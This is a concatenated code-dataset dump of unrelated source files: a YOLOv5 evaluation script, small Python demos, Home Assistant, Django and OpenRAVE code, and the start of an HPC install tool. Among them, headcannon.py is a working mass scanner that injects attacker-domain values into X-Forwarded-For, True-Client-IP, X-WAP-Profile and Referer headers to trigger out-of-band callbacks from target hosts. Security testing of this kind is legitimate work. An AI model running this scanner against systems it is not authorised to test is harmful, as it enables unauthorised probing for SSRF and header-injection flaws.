'bbox': [round(x, 3) for x in b],
'score': round(p[4], 5)})
# Assign all predictions as incorrect
correct = torch.zeros(pred.shape[0], niou, dtype=torch.bool, device=device)
if nl:
detected = [] # target indices
tcls_tensor = labels[:, 0]
# target boxes
tbox = xywh2xyxy(labels[:, 1:5])
scale_coords(img[si].shape[1:], tbox, shapes[si][0], shapes[si][1]) # native-space labels
if plots:
confusion_matrix.process_batch(predn, torch.cat((labels[:, 0:1], tbox), 1))
# Per target class
for cls in torch.unique(tcls_tensor):
ti = (cls == tcls_tensor).nonzero(as_tuple=False).view(-1) # target indices
pi = (cls == pred[:, 5]).nonzero(as_tuple=False).view(-1) # prediction indices
# Search for detections
if pi.shape[0]:
# Prediction to target ious
ious, i = box_iou(predn[pi, :4], tbox[ti]).max(1) # best ious, indices
# Append detections
detected_set = set()
for j in (ious > iouv[0]).nonzero(as_tuple=False):
d = ti[i[j]] # detected target
if d.item() not in detected_set:
detected_set.add(d.item())
detected.append(d)
correct[pi[j]] = ious[j] > iouv # iou_thres is 1xn
if len(detected) == nl: # all targets already located in image
break
# Append statistics (correct, conf, pcls, tcls)
stats.append((correct.cpu(), pred[:, 4].cpu(), pred[:, 5].cpu(), tcls))
# Plot images
if plots and batch_i < 3:
f = save_dir / f'test_batch{batch_i}_labels.jpg' # labels
Thread(target=plot_images, args=(img, targets, paths, f, names), daemon=True).start()
f = save_dir / f'test_batch{batch_i}_pred.jpg' # predictions
Thread(target=plot_images, args=(img, output_to_target(out), paths, f, names), daemon=True).start()
# Compute statistics
stats = [np.concatenate(x, 0) for x in zip(*stats)] # to numpy
if len(stats) and stats[0].any():
p, r, ap, f1, ap_class = ap_per_class(*stats, plot=plots, save_dir=save_dir, names=names)
ap50, ap = ap[:, 0], ap.mean(1) # AP@0.5, AP@0.5:0.95
mp, mr, map50, map = p.mean(), r.mean(), ap50.mean(), ap.mean()
nt = np.bincount(stats[3].astype(np.int64), minlength=nc) # number of targets per class
else:
nt = torch.zeros(1)
# Print results
pf = '%20s' + '%11i' * 2 + '%11.3g' * 4 # print format
print(pf % ('all', seen, nt.sum(), mp, mr, map50, map))
# Print results per class
if (verbose or (nc < 50 and not training)) and nc > 1 and len(stats):
for i, c in enumerate(ap_class):
print(pf % (names[c], seen, nt[c], p[i], r[i], ap50[i], ap[i]))
# Print speeds
t = tuple(x / seen * 1E3 for x in (t0, t1, t2)) # speeds per image
if not training:
shape = (batch_size, 3, imgsz, imgsz)
print(f'Speed: %.1fms pre-process, %.1fms inference, %.1fms NMS per image at shape {shape}' % t)
# Plots
if plots:
confusion_matrix.plot(save_dir=save_dir, names=list(names.values()))
if wandb_logger and wandb_logger.wandb:
val_batches = [wandb_logger.wandb.Image(str(f), caption=f.name) for f in sorted(save_dir.glob('test*.jpg'))]
wandb_logger.log({"Validation": val_batches})
if wandb_images:
wandb_logger.log({"Bounding Box Debugger/Images": wandb_images})
# Save JSON
if save_json and len(jdict):
w = Path(weights[0] if isinstance(weights, list) else weights).stem if weights is not None else '' # weights
anno_json = str(Path(data.get('path', '../coco')) / 'annotations/instances_val2017.json') # annotations json
pred_json = str(save_dir / f"{w}_predictions.json") # predictions json
print('\nEvaluating pycocotools mAP... saving %s...' % pred_json)
with open(pred_json, 'w') as f:
json.dump(jdict, f)
try: # https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb
check_requirements(['pycocotools'])
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
anno = COCO(anno_json) # init annotations api
pred = anno.loadRes(pred_json) # init predictions api
eval = COCOeval(anno, pred, 'bbox')
if is_coco:
eval.params.imgIds = [int(Path(x).stem) for x in dataloader.dataset.img_files] # image IDs to evaluate
eval.evaluate()
eval.accumulate()
eval.summarize()
map, map50 = eval.stats[:2] # update results (mAP@0.5:0.95, mAP@0.5)
except Exception as e:
print(f'pycocotools unable to run: {e}')
# Return results
model.float() # for training
if not training:
s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if save_txt else ''
print(f"Results saved to {save_dir}{s}")
maps = np.zeros(nc) + map
for i, c in enumerate(ap_class):
maps[c] = ap[i]
return (mp, mr, map50, map, *(loss.cpu() / len(dataloader)).tolist()), maps, t
def parse_opt():
parser = argparse.ArgumentParser(prog='test.py')
parser.add_argument('--data', type=str, default='data/coco128.yaml', help='dataset.yaml path')
parser.add_argument('--weights', nargs='+', type=str, default='yolov5s.pt', help='model.pt path(s)')
parser.add_argument('--batch-size', type=int, default=32, help='batch size')
parser.add_argument('--imgsz', '--img', '--img-size', type=int, default=640, help='inference size (pixels)')
parser.add_argument('--conf-thres', type=float, default=0.001, help='confidence threshold')
parser.add_argument('--iou-thres', type=float, default=0.6, help='NMS IoU threshold')
parser.add_argument('--task', default='val', help='train, val, test, speed or study')
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--single-cls', action='store_true', help='treat as single-class dataset')
parser.add_argument('--augment', action='store_true', help='augmented inference')
parser.add_argument('--verbose', action='store_true', help='report mAP by class')
parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
parser.add_argument('--save-hybrid', action='store_true', help='save label+prediction hybrid results to *.txt')
parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
parser.add_argument('--save-json', action='store_true', help='save a cocoapi-compatible JSON results file')
parser.add_argument('--project', default='runs/test', help='save to project/name')
parser.add_argument('--name', default='exp', help='save to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
parser.add_argument('--half', action='store_true', help='use FP16 half-precision inference')
opt = parser.parse_args()
opt.save_json |= opt.data.endswith('coco.yaml')
opt.save_txt |= opt.save_hybrid
opt.data = check_file(opt.data) # check file
return opt
def main(opt):
set_logging()
print(colorstr('test: ') + ', '.join(f'{k}={v}' for k, v in vars(opt).items()))
check_requirements(exclude=('tensorboard', 'thop'))
if opt.task in ('train', 'val', 'test'): # run normally
run(**vars(opt))
elif opt.task == 'speed': # speed benchmarks
for w in opt.weights if isinstance(opt.weights, list) else [opt.weights]:
run(opt.data, weights=w, batch_size=opt.batch_size, imgsz=opt.imgsz, conf_thres=.25, iou_thres=.45,
save_json=False, plots=False)
elif opt.task == 'study': # run over a range of settings and save/plot
# python test.py --task study --data coco.yaml --iou 0.7 --weights yolov5s.pt yolov5m.pt yolov5l.pt yolov5x.pt
x = list(range(256, 1536 + 128, 128)) # x axis (image sizes)
for w in opt.weights if isinstance(opt.weights, list) else [opt.weights]:
f = f'study_{Path(opt.data).stem}_{Path(w).stem}.txt' # filename to save to
y = [] # y axis
for i in x: # img-size
print(f'\nRunning {f} point {i}...')
r, _, t = run(opt.data, weights=w, batch_size=opt.batch_size, imgsz=i, conf_thres=opt.conf_thres,
iou_thres=opt.iou_thres, save_json=opt.save_json, plots=False)
y.append(r + t) # results and times
np.savetxt(f, y, fmt='%10.4g') # save
os.system('zip -r study.zip study_*.txt')
plot_study_txt(x=x) # plot
if __name__ == "__main__":
opt = parse_opt()
main(opt)
| 50.133515 | 121 | 0.575357 |
0807e6801a24116b10f78baf12d2fe6616b27c12 | 285 | py | Python | 17. Chapter_/redis_choc_supply.py | Mikma03/Python_Bill_Lubanovic_BookCodes | 8b5b228bb500a08af645a1db6f7c5f33ef5f0512 | [
"MIT"
] | null | null | null | 17. Chapter_/redis_choc_supply.py | Mikma03/Python_Bill_Lubanovic_BookCodes | 8b5b228bb500a08af645a1db6f7c5f33ef5f0512 | [
"MIT"
] | null | null | null | 17. Chapter_/redis_choc_supply.py | Mikma03/Python_Bill_Lubanovic_BookCodes | 8b5b228bb500a08af645a1db6f7c5f33ef5f0512 | [
"MIT"
] | null | null | null | import redis
import random
from time import sleep
conn = redis.Redis()
varieties = ['mleczna', 'gorzka', 'karmelowa', 'orzechowa']
conveyor = 'czekolady'
while True:
seconds = random.random()
sleep(seconds)
piece = random.choice(varieties)
conn.rpush(conveyor, piece)
| 21.923077 | 59 | 0.705263 |
ea289e499c14f108b483267c19c5836fe6bcf8f2 | 357 | py | Python | taylor_series.py | euneestella/numerical-analysis-python | 9679c943a60854f40980fbc3f4d2c82d6bfeb995 | [
"MIT"
] | null | null | null | taylor_series.py | euneestella/numerical-analysis-python | 9679c943a60854f40980fbc3f4d2c82d6bfeb995 | [
"MIT"
] | 3 | 2020-09-25T14:34:26.000Z | 2020-10-17T16:36:25.000Z | taylor_series.py | euneestella/numerical-analysis-python | 9679c943a60854f40980fbc3f4d2c82d6bfeb995 | [
"MIT"
] | null | null | null | import math
def taylor_series1(x, degree):
exponential = 0
for i in range(degree + 1):
exponential += x**i/math.factorial(i)
return exponential
def taylor_series2(x, degree):
exponential = 0
x = x*(-1) # remove negative sign
for i in range(degree + 1):
exponential += x**i/math.factorial(i)
return 1/exponential | 25.5 | 45 | 0.638655 |
da805ca3f1a7d360510b88e6cf027978843f3625 | 6,977 | py | Python | headcannon.py | disasterbyte/HeadCannon | 46b59dfbb7e481ccdb9457b18ab08c88e6f72fb0 | [
"MIT"
] | 1 | 2019-08-24T13:05:12.000Z | 2019-08-24T13:05:12.000Z | headcannon.py | disasterbyte/HeadCannon | 46b59dfbb7e481ccdb9457b18ab08c88e6f72fb0 | [
"MIT"
] | null | null | null | headcannon.py | disasterbyte/HeadCannon | 46b59dfbb7e481ccdb9457b18ab08c88e6f72fb0 | [
"MIT"
] | null | null | null | #!/usr/bin/python3
import sys
import uuid
import time
import asyncio
import argparse
import requests
from random import choice
from colorama import Fore, Style, init
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util.retry import Retry
from concurrent.futures import ThreadPoolExecutor
banner = """
{}:{}:{} H E A D C A N N O N {}:{}:{}
"""
def timestamp(): return time.strftime('%x %X')
def info(string): print('{}{}[+]{} {}{}{} - {}'.format(Style.BRIGHT, Fore.BLUE, Style.RESET_ALL, Style.DIM, timestamp(), Style.RESET_ALL, string))
def warn(string): print('{}{}[!]{} {}{}{} - {}'.format(Style.BRIGHT, Fore.YELLOW, Style.RESET_ALL, Style.DIM, timestamp(), Style.RESET_ALL, string))
def error(string): print('{}{}[!]{} {}{}{} - {}'.format(Style.BRIGHT, Fore.RED, Style.RESET_ALL, Style.DIM, timestamp(), Style.RESET_ALL, string))
def stats(key, value): print('{:>16}{} : {}{}{}{}'.format(key, Style.DIM, Style.BRIGHT, Fore.CYAN, value, Style.RESET_ALL))
user_agents = ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14',
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0']
def test_url(session, host, referer):
if args.ssl:
protocol = 'https://'
else:
protocol = 'http://'
# build the headers with uuid for tracking
forwarded_for = host + '.forwardfor.' + referer
true_client_ip = host + '.trueclient.' + referer
wap_profile = protocol + host + '.wap.' + referer + '/wap.xml'
referer = protocol + host + '.referer.' + referer
user_agent = choice(user_agents)
headers = {'X-Forwarded-For' : forwarded_for,
'True-Client-IP' : true_client_ip,
'X-WAP-Profile' : wap_profile,
'Referer' : referer,
'User-Agent': user_agent,
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'}
info('{}{}{}{} - {}'.format(Style.BRIGHT, Fore.BLUE, 'GET', Style.RESET_ALL, host))
# send the request, check the status
try:
response = session.get(protocol+host,
headers=headers,
timeout=args.timeout,
proxies=proxies,
verify=False)
if response.status_code != 200:
if args.verbose:
warn('{}{}{}{} - {}'.format(Style.BRIGHT, Fore.YELLOW, response.status_code, Style.RESET_ALL, host))
return True
except Exception as e:
if args.verbose:
error('{}{}{}{} - {}'.format(Style.BRIGHT, Fore.RED, 'ERR', Style.RESET_ALL, host))
return False
async def run_ansync():
if args.list:
with open(args.list, 'r') as f:
target_list = [t.strip() for t in f.readlines()]
else:
target_list = [args.domain]
# show the config
stats('workers', args.workers)
stats('targets', len(target_list))
print('')
with ThreadPoolExecutor(max_workers=args.workers) as executor:
with requests.Session() as session:
# configure the retries
retry = Retry(
total=args.retries,
backoff_factor=0.3,
status_forcelist=(500, 502, 504),
)
adapter = HTTPAdapter(max_retries=retry, pool_connections=50, pool_maxsize=50)
session.mount('http://', adapter)
session.mount('https://', adapter)
# configure the connection
session.keep_alive = False
# in case SSL fails
session.verify = False
requests.packages.urllib3.disable_warnings()
# run in executor loop
loop = asyncio.get_event_loop()
tasks = [
loop.run_in_executor(
executor,
test_url,
*(session, target, args.attacker)
)
for target in target_list
]
for response in await asyncio.gather(*tasks):
pass
def main():
# cross platform colorama
init()
# show the leet banner
print(banner.format(Fore.CYAN, Fore.MAGENTA, Style.RESET_ALL, Fore.MAGENTA,
Fore.CYAN, Style.RESET_ALL))
# start the async loop
loop = asyncio.get_event_loop()
future = asyncio.ensure_future(run_ansync())
loop.run_until_complete(future)
if __name__ == '__main__':
if len(sys.argv) < 2:
print('try ./headcannon.py --help')
exit(0)
parser = argparse.ArgumentParser(description="HTTP Header Tester idk")
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('-d', '--domain', metavar='', help='Domain to target')
group.add_argument('-l', '--list', metavar='', help='Specify list of domains to targets')
parser.add_argument('-a', '--attacker', required=True, metavar='', help='Url of referrer (ex: pwned.com)')
parser.add_argument('-w', '--workers', type=int, metavar='', default=10, help='Max number of concurrent workers (default 10)')
parser.add_argument('-s', '--ssl', action='store_true', default=False, help='Use https instead of http')
parser.add_argument('-t', '--timeout', type=int, metavar='', default=5, help='Specify request timeout (default 5 sec)')
parser.add_argument('-r', '--retries', type=int, metavar='', default=5, help='Specify max retries (default 5)')
parser.add_argument('-p', '--proxy', metavar='', help='Specify proxy (127.0.0.1:8080 or user:pass@127.0.0.1:8080)')
parser.add_argument('-v', '--verbose', action='store_true', help='Enable verbose output')
args = parser.parse_args()
if args.proxy:
proxies = {'http': args.proxy, 'https': args.proxy}
else:
proxies = None
main()
| 42.542683 | 148 | 0.603411 |
7d492325c23b5555dc0e02ca4b4a7c9305ec3e1a | 734 | py | Python | scripts/startup_herb.py | papallas/or_urdf | 31b3b2f1efd4a504c16df83910105643c2af031a | [
"BSD-3-Clause"
] | 21 | 2015-06-03T08:19:06.000Z | 2022-02-11T17:39:28.000Z | scripts/startup_herb.py | papallas/or_urdf | 31b3b2f1efd4a504c16df83910105643c2af031a | [
"BSD-3-Clause"
] | 28 | 2015-03-23T15:54:44.000Z | 2020-02-29T17:28:33.000Z | scripts/startup_herb.py | papallas/or_urdf | 31b3b2f1efd4a504c16df83910105643c2af031a | [
"BSD-3-Clause"
] | 28 | 2015-04-17T11:47:21.000Z | 2021-11-23T03:13:41.000Z | #!/usr/bin/env python
#
# Loads a URDF to test the loader.
#
import os;
# Get this script path (in or_urdf) and add it to the openrave path
or_urdf_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'lib')
or_plugin_path = os.getenv('OPENRAVE_PLUGINS', '')
os.environ['OPENRAVE_PLUGINS'] = os.pathsep.join([or_urdf_path, or_plugin_path])
import openravepy
env = openravepy.Environment()
env.SetViewer('qtcoin')
plugin = openravepy.RaveCreateModule(env, "urdf")
plugin.SendCommand("load /homes/pkv/ros/local/systemconf/herb2.urdf")
#plugin.SendCommand("load /homes/pkv/ros/local/apps/librarian/tema_tim_description/robots/tim/tim.urdf")
#plugin.SendCommand("load /homes/pkv/ros/local/herb_urdf/robots/herb_urdf.URDF")
| 34.952381 | 104 | 0.768392 |
6db1d529fb366ce6b3cd7bdc7cbefc9b53cad844 | 4,168 | py | Python | homeassistant/components/amberelectric/coordinator.py | colemamd/home-assistant | 718f8d8bf796e9bb7cbdc29a7f2d19d79e9f5927 | [
"Apache-2.0"
] | 1 | 2022-03-21T01:52:23.000Z | 2022-03-21T01:52:23.000Z | homeassistant/components/amberelectric/coordinator.py | ehendrix23/home-assistant | 0044fa9fb9794dad5290a431b5f339640748e477 | [
"Apache-2.0"
] | 75 | 2020-08-05T07:22:42.000Z | 2022-03-23T21:54:57.000Z | homeassistant/components/amberelectric/coordinator.py | colemamd/home-assistant | 718f8d8bf796e9bb7cbdc29a7f2d19d79e9f5927 | [
"Apache-2.0"
] | null | null | null | """Amber Electric Coordinator."""
from __future__ import annotations
from datetime import timedelta
from typing import Any
from amberelectric import ApiException
from amberelectric.api import amber_api
from amberelectric.model.actual_interval import ActualInterval
from amberelectric.model.channel import ChannelType
from amberelectric.model.current_interval import CurrentInterval
from amberelectric.model.forecast_interval import ForecastInterval
from homeassistant.core import HomeAssistant
from homeassistant.helpers.update_coordinator import DataUpdateCoordinator, UpdateFailed
from .const import LOGGER
def is_current(interval: ActualInterval | CurrentInterval | ForecastInterval) -> bool:
"""Return true if the supplied interval is a CurrentInterval."""
return isinstance(interval, CurrentInterval)
def is_forecast(interval: ActualInterval | CurrentInterval | ForecastInterval) -> bool:
"""Return true if the supplied interval is a ForecastInterval."""
return isinstance(interval, ForecastInterval)
def is_general(interval: ActualInterval | CurrentInterval | ForecastInterval) -> bool:
"""Return true if the supplied interval is on the general channel."""
return interval.channel_type == ChannelType.GENERAL
def is_controlled_load(
interval: ActualInterval | CurrentInterval | ForecastInterval,
) -> bool:
"""Return true if the supplied interval is on the controlled load channel."""
return interval.channel_type == ChannelType.CONTROLLED_LOAD
def is_feed_in(interval: ActualInterval | CurrentInterval | ForecastInterval) -> bool:
"""Return true if the supplied interval is on the feed in channel."""
return interval.channel_type == ChannelType.FEED_IN
class AmberUpdateCoordinator(DataUpdateCoordinator):
"""AmberUpdateCoordinator - In charge of downloading the data for a site, which all the sensors read."""
def __init__(
self, hass: HomeAssistant, api: amber_api.AmberApi, site_id: str
) -> None:
"""Initialise the data service."""
super().__init__(
hass,
LOGGER,
name="amberelectric",
update_interval=timedelta(minutes=1),
)
self._api = api
self.site_id = site_id
def update_price_data(self) -> dict[str, dict[str, Any]]:
"""Update callback."""
result: dict[str, dict[str, Any]] = {
"current": {},
"forecasts": {},
"grid": {},
}
try:
data = self._api.get_current_price(self.site_id, next=48)
except ApiException as api_exception:
raise UpdateFailed("Missing price data, skipping update") from api_exception
current = [interval for interval in data if is_current(interval)]
forecasts = [interval for interval in data if is_forecast(interval)]
general = [interval for interval in current if is_general(interval)]
if len(general) == 0:
raise UpdateFailed("No general channel configured")
result["current"]["general"] = general[0]
result["forecasts"]["general"] = [
interval for interval in forecasts if is_general(interval)
]
result["grid"]["renewables"] = round(general[0].renewables)
controlled_load = [
interval for interval in current if is_controlled_load(interval)
]
if controlled_load:
result["current"]["controlled_load"] = controlled_load[0]
result["forecasts"]["controlled_load"] = [
interval for interval in forecasts if is_controlled_load(interval)
]
feed_in = [interval for interval in current if is_feed_in(interval)]
if feed_in:
result["current"]["feed_in"] = feed_in[0]
result["forecasts"]["feed_in"] = [
interval for interval in forecasts if is_feed_in(interval)
]
LOGGER.debug("Fetched new Amber data: %s", data)
return result
async def _async_update_data(self) -> dict[str, Any]:
"""Async update wrapper."""
return await self.hass.async_add_executor_job(self.update_price_data)
| 37.54955 | 108 | 0.683781 |
2575f74c30355a567d1f2ced3029af5571029521 | 734 | py | Python | script.py | Ragug/photo-editor | 3045b0d7a289e1da09ad8fe61744e66916a89cf2 | [
"MIT"
] | null | null | null | script.py | Ragug/photo-editor | 3045b0d7a289e1da09ad8fe61744e66916a89cf2 | [
"MIT"
] | null | null | null | script.py | Ragug/photo-editor | 3045b0d7a289e1da09ad8fe61744e66916a89cf2 | [
"MIT"
] | null | null | null | class script(object):
START_MSG = """ <b>Hi {}
I'm a Image Editor Bot which Supports various modes
For more click help....</b>"""
HELP_MSG = """Hi, Follow these Steps..
<code>🌀 Send me any Image to Edit..</code>
<code>🌀 Select the Corresponding mode that you need</code>
<code>🌀 Your Edited Image will be Uploaded </code>
<code>🌀 you can get telegram sticker package on my Instagram story highlights check there </code>
© Made by RAGU G"""
ABOUT_MSG = """⭕️<b>My Name : RAGU</b>
⭕️<b>INSTAGRAM I'd : ragug19</b>
⭕️<b>INSTAGRAM link 🔗:</b> 👉 <a href='https://www.instagram.com/ragug19?r=nametag'>Click Here</a>
⭕️<b>Report Bugs 😊 :</b> 👉 <a href='https://www.instagram.com/ragug19?r=nametag'>Click Here</a>"""
| 27.185185 | 99 | 0.653951 |
c68a81cc235de75ee52c5e12fa2d32b55889f5e1 | 735 | py | Python | userarea/forms/keygroup.py | eieste/SSHock | 04bcbb2593e104c0ecb1b5dc9b79b19b4681c96b | [
"MIT"
] | null | null | null | userarea/forms/keygroup.py | eieste/SSHock | 04bcbb2593e104c0ecb1b5dc9b79b19b4681c96b | [
"MIT"
] | 2 | 2019-12-13T08:06:34.000Z | 2020-06-05T19:46:47.000Z | userarea/forms/keygroup.py | eieste/SSHock | 04bcbb2593e104c0ecb1b5dc9b79b19b4681c96b | [
"MIT"
] | null | null | null | from django import forms
from superarea.models import PublishGroup
from userarea.models import KeyGroup
class KeyGroupCreateForm(forms.ModelForm):
class Meta:
fields = ("display_name",)
model = KeyGroup
def clean(self):
self.cleaned_data['name'] = self.cleaned_data["display_name"]
return self.cleaned_data
class AssignKeyGroupToPublicKeyForm(forms.Form):
key_groups = forms.ModelMultipleChoiceField(queryset=KeyGroup.objects.none(), required=False)
# BaseForm
class AssignPublishGroupToKeyGroupForm(forms.Form):
template_form_name = "assign_publishgroup_to_keygroup_form"
publish_groups = forms.ModelMultipleChoiceField(required=False, queryset=PublishGroup.objects.none()) | 29.4 | 105 | 0.770068 |
5d81c228868b22db6dbca44b829820e764d173c9 | 5,657 | py | Python | bilalcoin/users/views.py | jphaser/bilalcoin | 31d8b466912e009c31615b0b1df1afe68ab4bdb8 | [
"MIT"
] | null | null | null | bilalcoin/users/views.py | jphaser/bilalcoin | 31d8b466912e009c31615b0b1df1afe68ab4bdb8 | [
"MIT"
] | 1 | 2022-03-31T03:16:16.000Z | 2022-03-31T03:16:16.000Z | bilalcoin/users/views.py | jphaser/bilalcoin | 31d8b466912e009c31615b0b1df1afe68ab4bdb8 | [
"MIT"
] | null | null | null | from __future__ import absolute_import
import requests
from django.conf import settings
from django.contrib import messages
from django.contrib.auth import get_user_model
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.messages.views import SuccessMessageMixin
from django.core.mail import EmailMessage, send_mail
from django.http import Http404
from django.shortcuts import get_object_or_404, redirect, render
from django.template.loader import get_template, render_to_string
from django.urls import reverse
from django.utils import timezone
from django.utils.translation import gettext_lazy as _
from django.views.generic import CreateView, DetailView, RedirectView, UpdateView
from .forms import UserPersonalForm, UserProfileForm, UserVerifyForm
from .models import UserProfile, UserVerify
User = get_user_model()
def home(request, *args, **kwargs):
username = str(kwargs.get('username'))
try:
user = User.objects.get(username=username)
request.session['ref_profile'] = user.id
print('user', user.id)
except:
pass
# print(request.session.get_expiry_age())
return render(request, 'pages/home.html', {})
class UserDetailView(LoginRequiredMixin, DetailView):
model = User
slug_field = "username"
slug_url_kwarg = "username"
# def get_context_data(self, **kwargs):
# context = super().get_context_data(**kwargs)
# context["crypto"] = get_crypto_data()
# return context
user_detail_view = UserDetailView.as_view()
class UserUpdateView(LoginRequiredMixin, SuccessMessageMixin, UpdateView):
model = UserProfile
form_class = UserProfileForm
# second_form_class = UserProfileForm
template_name = 'users/user_form.html'
success_message = _("Your personal information was successfully updated")
slug_field = "username"
slug_url_kwarg = "username"
def get_success_url(self):
return self.request.user.get_absolute_url() # type: ignore [union-attr]
def get_object(self):
self.user = self.request.user
return super().get_object()
def get_object(self):
username = self.kwargs.get('username')
if username is None:
raise Http404
return get_object_or_404(UserProfile, user__username__iexact=username)
def get(self, request, *args, **kwargs):
self.user = request.user
return super().get(request, *args, **kwargs)
# def get_context_data(self, **kwargs):
# context = super().get_context_data(**kwargs)
# context["profileform"] = self.form_class(self.request.POST, self.request.FILES, instance=self.request.user)
# return context
def form_valid(self, form):
form.save()
time = timezone.now()
userdata = self.request.user
title = "User Data Update"
msg = f"{userdata.username} just updated his personal details at {time}"
message = get_template('mail/admin-mail.html').render(context={"user_username": userdata.username, "title": title, "time": time, "message": msg})
recepient = str(userdata.email)
frm = settings.EMAIL_HOST_USER
mail = EmailMessage(
title,
#f"{self.request.user.username} just updated his profile at {self.created}",
message,
frm,
[recepient],
)
mail.content_subtype = "html"
mail.send()
return super().form_valid(form)
def form_invalid(self, form):
return messages.error(self.request, "Form was not submited successfully. Check your informations!")
user_update_view = UserUpdateView.as_view()
class UserRedirectView(LoginRequiredMixin, RedirectView):
permanent = False
def get_redirect_url(self):
return reverse("users:detail", kwargs={"username": self.request.user.username})
user_redirect_view = UserRedirectView.as_view()
class UserVerifyCreateView(LoginRequiredMixin, SuccessMessageMixin, UpdateView):
model = UserVerify
form_class = UserVerifyForm
template_name = 'users/verify.html'
slug_field = "username"
slug_url_kwarg = "username"
success_message = _("Verification information was successfully created")
def get_success_url(self):
return self.request.user.get_absolute_url() # type: ignore [union-attr]
def get_object(self):
username = self.kwargs.get('username')
if username is None:
raise Http404
return get_object_or_404(UserVerify, user__username__iexact=username)
def get(self, request, *args, **kwargs):
self.user = request.user
return super().get(request, *args, **kwargs)
def form_valid(self, form):
form.save()
time = timezone.now()
title = "New Verification Request"
msg = f"{self.request.user.username} just submited informations for his profile verification at {time}"
message = get_template('mail/admin-mail.html').render(context={"user_username": self.request.user.username, "title": title, "time": time, "message": msg})
recepient = self.request.user.email
sender = settings.EMAIL_HOST_USER
mail = EmailMessage(
title,
message,
sender,
[recepient]
)
mail.content_subtype = "html"
mail.send()
return super().form_valid(form)
def form_invalid(self, form):
return messages.error(self.request, "Form was not submited successfully. Check your informations!")
user_verify_view = UserVerifyCreateView.as_view()
| 34.284848 | 162 | 0.680219 |
a39ba18e256682f836ba55e07629a3a054229a06 | 26,490 | py | Python | hpcinstall.py | NCAR/HPCinstall | e70e984305bfc6c54725601bb14ce5f499e65bc9 | [
"BSD-3-Clause"
] | 5 | 2017-09-15T22:25:15.000Z | 2019-04-08T22:44:00.000Z | hpcinstall.py | NCAR/HPCinstall | e70e984305bfc6c54725601bb14ce5f499e65bc9 | [
"BSD-3-Clause"
] | 15 | 2017-03-08T21:42:19.000Z | 2019-04-22T20:04:26.000Z | hpcinstall.py | NCAR/HPCinstall | e70e984305bfc6c54725601bb14ce5f499e65bc9 | [
"BSD-3-Clause"
] | 4 | 2017-05-02T15:36:25.000Z | 2022-03-29T19:39:57.000Z | #!/usr/bin/env python
import argparse, os, stat, shutil, sys, subprocess, yaml, datetime, re, glob
from collections import namedtuple, OrderedDict
import tee, hashdir
import blessed
term = blessed.Terminal()
HPCi_log = "hpci.main.log"
env_log = "hpci.env.log"
module_log = "hpci.modules.log"
config_options = {'list_of_dirs': ['scratch_tree', 'sw_install_dir', 'mod_install_dir'],
'install_struct': ['sw_install_struct', 'mod_install_struct' ],
'optional': ['python_cmd', 'script_repo', 'git_cmd', 'use_modules'],
}
def print_invocation_info():
if os.environ['USER'] == "csgteam":
running_user = "csgteam (invoked by " + os.environ['SUDO_USER'] + ")"
else:
running_user = os.environ['USER']
print term.bold_magenta("On " + str(datetime.datetime.now().isoformat()) + " " + running_user)
print term.bold_magenta("called HPCinstall from " + os.path.realpath(__file__))
print term.bold_magenta("invoked as"),
arguments = list(sys.argv)
try:
ssh_position = arguments.index("--nossh")
arguments.pop(ssh_position)
except ValueError:
print >> sys.stderr, term.bold_red("INTERNAL ERROR: Wrong ssh invocation, please report it to https://github.com/NCAR/HPCinstall/issues/")
sys.exit(2)
try:
arguments.pop(ssh_position) # was ssh_position + 1
except IndexError:
pass # sudo user is optional
simple = True
for arg in arguments:
if " " in arg or "'" in arg or '"' in arg or "\\" in arg:
simple = False
if simple:
print " ".join(arguments)
else:
print arguments
print # emtpy line
def parse_config_data(yaml_data):
default_dirs = {}
config = yaml.safe_load(yaml_data)
if not config:
raise KeyError(config_options['list_of_dirs'] + config_options['install_struct'])
for dirname in config_options['list_of_dirs']:
default_dirs[dirname] = os.path.abspath(
os.path.expandvars(
os.path.expanduser(
config[dirname]))) + "/"
for thing in config_options['install_struct']: # mandatory
default_dirs[thing] = config[thing]
default_dirs['use_modules'] = True # unless found as optional...
for thing in config_options['optional']:
if thing in config:
default_dirs[thing] = config[thing]
return default_dirs
def parse_installscript_filename(filename):
sw_structure = filename.split("-")
if len(sw_structure) < 3:
print >> sys.stderr, term.bold_red("The software name and version must be specified as <build-software-version>. Got '" + filename + "' instead.")
print >> sys.stderr, term.bold_red("Or you may use any filename, by including #HPCI -n software' and '#HPCI -v version' directives")
